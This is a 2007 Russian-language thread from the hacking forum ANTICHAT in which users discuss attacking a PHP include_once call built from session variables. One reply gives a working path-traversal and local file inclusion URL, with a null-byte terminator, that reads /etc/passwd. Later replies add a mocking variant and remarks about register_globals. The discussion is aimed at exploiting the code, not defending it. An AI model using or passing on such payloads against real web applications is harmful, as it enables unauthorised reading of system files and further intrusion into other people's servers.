HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > ПРОГРАММИРОВАНИЕ > PHP
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

include
  #1  
Старый 20.06.2007, 06:01
guest3297
Banned
Регистрация: 27.06.2006
Сообщений: 1,614
С нами: 10459106

Репутация: 2996


По умолчанию include

Цитата:
18: include_once("../web/".$session_chat[$sid]['asp_login']."/".$session_chat[$sid]['asp_login']."-conf-init.php") ;
у кого какие мысли?
можно раздрочить?
 
Ответить с цитированием

  #2  
Старый 20.06.2007, 10:41
hhover
Познающий
Регистрация: 21.05.2007
Сообщений: 61
С нами: 9986942

Репутация: 145
По умолчанию

Код:
/script.php?sid=1&session_chat[1][asp_login]=../../../../../etc/passwd%00
 
Ответить с цитированием

  #3  
Старый 20.06.2007, 10:47
_Great_
Флудер
Регистрация: 27.12.2005
Сообщений: 2,372
С нами: 10721066

Репутация: 4360


По умолчанию

hhover, здорово, только вот если register_globals=off...
 
Ответить с цитированием

  #4  
Старый 20.06.2007, 11:45
KEZ
Banned
Регистрация: 18.05.2005
Сообщений: 1,981
С нами: 11042306

Репутация: 2726


По умолчанию

надо тогда так
Код:
/script.php?REGISTER_GLOBALS=ON&sid=1&session_chat[1][asp_login]=../../../../../etc/passwd%00
=\\\\\\\
 
Ответить с цитированием

  #5  
Старый 20.06.2007, 12:23
SMiX
Участник форума
Регистрация: 25.07.2005
Сообщений: 246
С нами: 10944326

Репутация: 174
По умолчанию

Ну просто отрубаем куки и смотрим sid в адресах ссылок на странице.
 
Ответить с цитированием

  #6  
Старый 20.06.2007, 12:26
GreenBear
наркоман с медалью
Регистрация: 07.05.2005
Сообщений: 3,704
С нами: 11058146

Репутация: 4536


По умолчанию

кез, ты забыл ini_set )
 
Ответить с цитированием
Ответ



Предыдущая тема Следующая тема
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Надо компоненты B1t.exe С/С++, C#, Rust, Swift, Go, Java, Perl, Ruby 6 22.04.2007 00:01



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.